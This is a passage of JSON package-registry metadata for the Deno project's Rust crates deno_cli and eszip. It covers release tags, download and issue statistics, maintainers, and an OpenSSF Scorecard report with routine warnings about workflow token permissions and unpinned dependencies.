deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-26T14:40:00.741Z","dependent_packages_count":0,"downloads":20482,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":21.016650935183236,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.028408309888841035,"forks_count":0.08705772385289993,"average":16.85254254373505},"purl":"pkg:cargo/deno_cli","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cli","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cli","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cli/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:48:12.804Z","issues_count":6610,"pull_requests_count":9623,"avg_time_to_close_issue":17236144.535497494,"avg_time_to_close_pull_request":1534358.7653889374,"issues_closed_count":3787,"pull_requests_closed_count":8008,"pull_request_authors_count":577,"issue_authors_count":2467,"avg_comments_per_issue":2.509531013615734,"avg_comments_per_pull_request":0.7160968512937753,"merged_pull_requests_count":6992,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":664,"past_year_pull_requests_count":1191,"past_year_avg_time_to_close_issue":1367826.3136363637,"past_year_avg_time_to_close_pull_request":1331942.9891472869,"past_year_issues_closed_count":220,"past_year_pull_requests_closed_count":645,"past_year_pull_request_authors_count":182,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.216867469879518,"past_year_avg_comments_per_pull_request":1.0839630562552478,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":474,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1789,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":386,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:21.318Z","updated_at":"2022-11-07T18:29:21.318Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:21.326Z","updated_at":"2022-11-07T18:29:21.326Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4076652,"name":"eszip","ecosystem":"cargo","description":"A utility that can download JavaScript and TypeScript module graphs and store them locally in a special zip file","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":167,"first_release_published_at":"2021-02-15T15:34:41.757Z","latest_release_published_at":"2026-08-06T11:48:15.250Z","latest_release_number":"0.135.0","last_synced_at":"2026-08-29T21:57:37.341Z","created_at":"2022-04-12T11:52:01.343Z","updated_at":"2026-08-29T21:57:37.342Z","registry_url":"https://crates.io/crates/eszip/","install_command":"cargo install eszip","documentation_url":"https://docs.rs/eszip/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to 